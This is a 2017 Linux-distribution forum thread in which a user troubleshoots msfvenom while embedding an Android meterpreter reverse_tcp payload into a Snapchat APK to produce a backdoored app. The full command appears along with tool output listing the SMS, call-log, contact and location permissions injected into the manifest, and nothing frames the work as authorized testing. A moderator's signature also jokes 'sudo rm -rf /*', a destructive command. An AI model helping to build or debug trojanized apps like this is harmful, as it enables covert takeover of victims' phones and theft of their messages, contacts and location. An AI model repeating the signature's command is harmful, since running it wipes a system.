Msvenom apk platform error

Started by MarcoRossi, August 05, 2017, 05:24:11 PM

Previous topic - Next topic

MarcoRossi

Hi I had Parrot OS as operating system, but now I set BackBox 5.
When launching msfvenom -x <payload original> lhost = ip lport = port -o backdoor.apk
I get error, can anyone help me?

Error:
Error: Malformed version number string 17:21:50 up 19 min, 2 users, load avarage: 0,00, 0,06, 0,14

ZEROF

Hi,

Are you sure that your are using good command, your output show that some of your args are not good, there is no space for lshot= for example. You need to add -p even for custom payload, like -p -.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

MarcoRossi

You are right I did not write it because it seemed obvious to me, but the complete command I use is "msfvenom -x <original> -p android/meterpreter/reverse_tcp lhost = xxx.xxx.xxx.xxx lport = xxxx -o /home/<name>/Backdoor.apk "

I used this command on Parrot OS is working perfectly

MarcoRossi

I update my version of apktool but now i see this eror:

<name>@backbox:~/Scaricati$ sudo msfvenom -x snapchat.apk -p android/meterpreter/reverse_tcp LHOST=<ip address> LPORT=<port> -o Backdoor.apk
Using APK template: snapchat.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
  • Creating signing key and keystore..
  • Decompiling original APK..
  • Decompiling payload APK..
  • Locating hook point..
  • Adding payload as package com.snapchat.android.eqfzo
  • Loading /tmp/d20170811-10776-bd3o30/original/smali/com/snapchat/android/AppShell.smali and injecting payload..
  • Poisoning the manifest with meterpreter permissions..
  • Adding <uses-permission android:name="android.permission.READ_SMS"/>
  • Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  • Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
  • Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
  • Adding <uses-permission android:name="android.permission.SEND_SMS"/>
  • Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
  • Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
  • Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  • Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
  • Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
  • Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
  • Rebuilding snapchat.apk with meterpreter injection as /tmp/d20170811-10776-bd3o30/output.apk
    Error: Unable to rebuild apk with apktool
    <name>@backbox:~/Scaricati$

    How can I resolve?

ZEROF

I didn't have time to check on this one, but it's best to check their github and open issue there, we didn't work on this tool and time for testing is kind limited on our side.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

ostendali

just googling would have told you the answer that the issue is not with BackBox but rather the tools or apk you are using...

I did nothing but just googled the error and picked the first results:
     https://github.com/dana-at-cp/backdoor-apk/issues/105
     https://github.com/rapid7/metasploit-framework/issues/8829

pls do preliminary search and don't just hop in here on forum for a ready meal!!!

briannamara

how about download an apk file on apknite and see inside it

MarvinHarris

This may be a solution, I've met the same problem, will try you way later